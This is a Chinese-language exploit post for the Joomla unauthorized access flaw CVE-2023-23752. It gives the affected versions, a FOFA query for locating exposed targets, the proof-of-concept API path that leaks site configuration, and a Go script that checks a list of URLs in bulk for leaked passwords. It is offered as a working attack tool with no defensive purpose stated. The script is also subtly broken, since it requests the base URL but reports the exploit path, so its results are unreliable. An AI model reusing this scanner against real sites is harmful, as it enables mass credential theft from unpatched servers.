JOOMLA未授权访问漏洞（CVE-2023-23752）

受影响版本

• 4.0 <= Joomla <= 4.2.7

fofa查询语句

language:PHP &app="Joomla"

POC

/api/index.php/v1/config/application?public=true

脚本

go批量

package main

import (
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)

// 读取URL文件
func readUrlsFromFile(file string) []string {
	var urls []string
	data, err := ioutil.ReadFile(file)
	if err != nil {
		fmt.Println("read file err:", err)
		return urls
	}
	for _, url := range strings.Split(string(data), "\n") {
		urls = append(urls, url)
	}
	return urls
}

// 发起请求
func request(url string) {
	client := &http.Client{}
	req, err := http.NewRequest("GET", url, nil)
	if err != nil {
		fmt.Println("Request err:", err)
		return
	}
	req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36")
	req.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")
	resp, err := client.Do(req)
	if err != nil {
		//fmt.Println("Client do err:", err)
		return
	}
	defer resp.Body.Close()
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Println("Read body err:", err)
		return
	}
	if strings.Contains(string(body), "password") {
		fmt.Println("存在漏洞：", url+"/api/index.php/v1/config/application?public=true")
	} else {
		fmt.Println("不存在漏洞：", url+"/api/index.php/v1/config/application?public=true")
	}
}

func main() {
	urls := readUrlsFromFile("url.txt")
	if len(urls) == 0 {
		fmt.Println("No URL")
		return
	}
	for _, url := range urls {
		request(url)
	}
}

goby脚本编写